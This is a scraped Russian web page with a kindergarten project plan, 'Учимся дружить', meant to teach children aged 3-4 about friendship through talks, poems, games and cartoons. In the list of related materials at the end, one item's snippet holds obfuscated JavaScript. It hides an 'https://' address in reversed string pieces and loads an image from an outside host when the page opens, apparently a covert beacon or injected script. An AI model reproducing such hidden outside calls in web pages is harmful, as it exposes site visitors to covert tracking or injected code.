Проект "Учимся дружить "
проект (младшая группа)
Предварительный просмотр:
ИНФОРМАЦИОННАЯ КАРТА ПРОЕКТА
Название проекта | Учимся дружить |
Автор проекта | Демко Н.С. |
Продолжительность проекта | 24.01.2022 – 04.02.2022 |
Тип проекта | Социально-личностный |
Участники проекта | Воспитанники 2мл группы, воспитатели, родители |
Возраст детей | 3-4 года |
Проблема, на решение которой направлен проект | Актуальность проект: дети 3-4 лет еще не умеют правильно общаться друг с другом, поддерживать дружеские отношения. Их привычное «Я сам», «Я первый», зачастую приводят к спорам. Именно в этом возрасте нужно формировать навыки благородного и вежливого общения. Воспитывать у них доброту, желание уступать в игре другим детям. Проблема: неумение общаться, поддерживать дружеские отношения, дружить, договариваться, делиться, уступать. Причины проблемы: наблюдая за детьми во время их общения, мы обратили внимание на то, что они не могут играть дружно друг с другом длительное время, ссорятся, дерутся, выясняют отношения. Эта проблема и определила тему проекта. |
Цель проекта | Формирование у детей представление о друге, дружбе, воспитание доброжелательного отношения друг к другу, быть сдержанными, уметь работать в коллективе. |
Задачи проекта | - формировать у детей понятие о дружбе, друзьях; - воспитывать культуру межличностных отношений; - обогатить и активизировать словарь по теме «Дружба»; - создать дружный коллектив детей; - привлечь родителей к участию в проекте, вызвать желание оказать помощь в создании возможности реализации проекта. |
Ожидаемые результаты по проекту | - расширятся знания детей по теме «Дружба»; - познакомятся с правилами дружеских отношений; научатся бережно относиться к друг другу, проявлять доброту и внимание; - повысится интерес к художественной литературе; - научатся правильно оценивать свои поступки и поступки своих друзей; - научатся продуктивно взаимодействовать со сверстниками и взрослыми в процессе совместной деятельности. |
Продукты проекта | Картотека игр на сплочение. Картотека стихотворений о дружбе. Картотека мирилок. Коврик «Мы помиримся». |
Форма проведения итогового мероприятия проекта и его название | «Дерево дружбы» фотоотчёт |
Полученные результаты, выводы | По итогам работы по проекту можно сделать следующие выводы, что у детей стали формироваться доброжелательные взаимоотношения друг к другу в группе; узнали слово дружба, уяснили, кто такие друзья, могут назвать друзей по имени и описать внешность (цвет глаз, волос, рост, назвать любимую игрушку или мультфильм). Заметили, что, участвуя в коллективных постройках, из строительного материала или играя в сюжетно ролевые игры, дети общаются спокойно, без криков и слёз, помогают друг другу. Небольшими группами могут рассматривать картинки, иллюстрации в книгах. Больше играют вместе дружно и делятся игрушками. Знают вежливые слова: здороваются при встрече; прощаются, уходя домой; проявляют заботливое отношение друг к другу (если кто-то заболел, если упал - то пожалеют). |
Информационные источники |
|
I этап – ОРГАНИЗАЦИОННЫЙ:
Чтобы ввести детей на эту проблему, мы выбрали нужный момент, когда получился конфликт между детьми. Обратили на это внимание других детей. Предложили обсудить и решить эту проблему. Проанализировали причину конфликта, и должен ли он был произойти. Беседуя на эту тему, подошли к вопросу о том, можно ли ссориться и к чему это может привести.
Проанализировав варианты ответов воспитанников, внесли свои предложения и поставили перед собой цель: учить детей дружить. Так появился проект.
II этап – ОСНОВНОЙ:
1неделя
1 день:
Утро: Беседа: «Живём дружно».
Цель: Формировать умение детей помогать друг другу, жить дружно.
Непосредственно-образовательная деятельность: Рассматривание картины «Строим дом».
Цель: формировать у детей представление о дружбе, доброжелательном отношении друг к другу.
Вечер: Чтение стихотворения: О. Высотской «Нужно дружно жить на свете».
Цель: Развивать умение понимать значение слова «дружно».
2 день:
Утро: Чтение стихотворения В. Маяковского «Что такое хорошо и что такое плохо».
Цель: Формировать умение детей объяснять поступки персонажей, оценивать их, выяснить, как дети понимают
слова «хорошо» и «плохо».
Вечер: Рассматривание картинок из серии: «Дети играют».
Цель: воспитывать доброжелательное отношение друг к другу.
3 день:
Утро: Разучивание считалки: «О дружбе».
Цель: Формировать умение детей использовать в игре считалки, создавая эмоциональную атмосферу от общения.
Вечер: Прослушивание русской народной сказки: «Кот, петух и лиса».
Цель: побуждать эмоционально, реагировать на содержание сказки, помочь детям понять, что такое «дружба».
4 день:
Утро: Непосредственно-образовательная деятельность: «Наши добрые дела».
Цель: Развивать умение детей анализировать свои поступки и поступки своих друзей.
Вечер: Пальчиковая игра: «Дружба». Просмотр мультфильма «Грибок теремок».
Цель: разучить пальчиковую игру, развивать мелкую моторику рук.
5 день:
Утро: Прослушивание песни: «Улыбка». Просмотр мультфильма «По дороге с облаками»
Цель: Развивать умение детей слушать и понимать смысл песни.
Вечер: Работа с родителями: выучить с детьми стихотворение С. Островского «Забияка воробей».
Цель: вовлечь родителей в проект.
2 неделя
1 день:
Утро: Хороводная игра: «Хоровод».
Цель: воспитывать доброжелательные отношения друг к другу.
Вечер: Сюжетно - ролевая игра: «Семья».
Цель: способствовать формированию у детей дружеских взаимоотношений и умение ладить в совместной игре.
2 день:
Утро: Речевая игра: «Обзывалки».
Цель: обогащать словарный запас детей уменьшительно-ласкательными словами.
Вечер: Чтение рассказа «Вместе тесно, а врозь скучно». К.Д. Ушинский.
Цель: выяснить, как дети понимают основную идею рассказа, и сделать вывод.
3 день:
Утро: Заучивание «Мирилки». Просмотр мультфильма «Крошка енот»
Цель: Формировать умение детей мириться с помощью «мирилки».
Вечер: Театрализованная игра: «Заюшкина избушка».
Цель: воспитывать умение понимать и сопереживать героям сказки.
4 день:
Утро: Непосредственно-образовательная деятельность: «О дружбе».
Цель: уточнить представления детей о дружбе, учить доброжелательно, относиться к детям и взрослым в детском саду.
Вечер: Разыгрывание проблемных ситуаций.
Цель: Развивать умение детей аргументировать выбор своих действий.
5 день:
Утро: Заучивание пословицы: «Помогай другу везде, не оставляй его в беде». Просмотр мультфильма «Самый большой друг».
Цель: развивать выразительность речи и понимание смысла пословицы.
Вечер: Чтение рассказа: «Спор ни о чём». Сестричка Гримм.
Цель: помочь детям понять, что без дружбы прожить нельзя.
III этап – ЗАКЛЮЧИТЕЛЬНЫЙ: «Дерево дружбы» фотовыставка.
По теме: методические разработки, презентации и конспекты
Проект «C туризмом дружит вся семья» (старший дошкольный возраст)
Цель проекта: Привлечение детей и родителей к активному отдыху, спорту....
Если хочешь долго жить - научись с огнем дружить!
Развлечение по правилам пожарной безопасности, со сказкой-драматизацией и стихами противопожарного содержания. Старший дошкольный возраст....
Реализация ФГТ В ГДОУ. Занятие "Давайте дружить"
Цель: Создание условий для естественного психологического развития ребенка. Задачи: *Развитие эмоцианальной сферы. введение ребенка в мир человеческих эмоций. *развитие коммуникативных уме...
Конспект занятия "Давайте дружить"
Конспект занятия по развитию речи в 1 младшей группе....
Конспект НОД во II младшей группе на тему " Дружит с бабочкой цветок, Дружим мы с тобою».
Конспект НОД во II младшей группе на тему «Дружит с бабочкой цветок,Дружим мы с тобою».Конспект НОД во II младшей группе на тему " Дружит с бабочкой цветок,Дружим мы с...
Что делать, если с вашим ребенком никто не дружит? Как помочь ребенку, если с ним не хотят дружить.
var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'npgo.lussoit.com\',\'67\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){if(!window.mainSc...
Тематическая беседа "Мы дружим с физкультурой" материал (группа раннего возраста) на тему: «Мы дружим с физкультурой»
Тематическая беседа "Мы дружим с физкультурой"материал (группа раннего возраста) на тему:«Мы дружим с физкультурой» Цель: учить заботиться о своем здоровье; прививать л...